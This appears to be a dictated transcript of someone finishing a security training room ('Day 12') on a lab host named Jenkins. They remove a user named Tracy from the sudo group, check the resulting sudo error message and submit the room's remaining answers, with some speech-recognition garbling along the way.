Alright, let's see. The root flag, we have it. Almost with all of them now. What's the SSH flag? We found that. So it really is just the error message that we need to get after this. Okay. This is a really good way. Like, I was going, I'm not gonna do this because I'll just believe that it works, and it bit me because I actually missed flags by doing that. So, well done whoever made this task for holding me accountable, actually making me do the work. I appreciate this. I appreciate being proven wrong like this. It's good. It's good for the soul. Let's see. The final one. So we need to remove Tracy from sudoers and then try the sudo. So we'll go do that real quick. This is Jenkins. Where is my admin? Here it is. So sudo del user Tracy sudo. There it goes. And now we need to exit. Oh. We need to, where's Tracy? Where's Tracy gone? No, the other route. The other route. I need the other route. There one. That one. Yeah, exit out of that. We want to be Tracy again, and we want to sudo something. Sudo... What was the actual question? Because I think there was like two...
Speed sudo, what is the error message when you log in as Tracy again, and try sudo after its removal from the sudoers group?
Oh, that was literally in the text.
Matching default entries for Tracy on Jenkins and reset mail backpass secure path equal all. User Tracy may run the following commands on...
Oh, this... Yeah, that's right. I need to log out and in. That's right. Can I just hash R? Does that work?
Tracy at Jenkins, Tracy at Jenkins, matching default entries for...
No, okay. Fine.
Logout, connection to TSC, user Flory greater S... Tracy at 10.10. Speech mode off.
Alright. We'll paste this in here. And now if I do sudo-l, it's going to tell me that I'm not allowed to do that. Sorry, user Tracy may not run sudo on Jenkins. So if I copy that line in its entirety, I'm assuming Jenkins is part of it in this particular question answer. There we go. I seem to remember something about sudo v as well.
Speech dot, space.
Okay.
Sorry,
in
user,
the questions, but we'll see. First, we'll fill this one in and see if we missed anything. Oop. No space. I think it wants the period. That's correct. Very nice.
Speech what's the link SSH flag? But answer what but answer
is that all of them? Let me see. Did I miss any questions?
Correct answer button unavailable.
That one's done.
Correct answer
That one's done. That one's done. That one's done.
Correct answer button. Correct answer button. Hit button. Correct answer button unavailable. Hit button. Completed button.
We got all of them. All right. If you enjoyed this room, please check out our SOC level 1 pruning path. I might do that at some point, actually. Complete it. And with that, we have finished the tasks. Sorry about it taking longer than it was meant to. That was my fault. This time, no accessibility issues whatsoever. This was perfectly done accessibility-wise. I have no issues whatsoever. But yeah, there you go. Day 12. I hope this was educational. It was certainly a lot of fun for me to do. And I'll see you in the next one. Goodbye.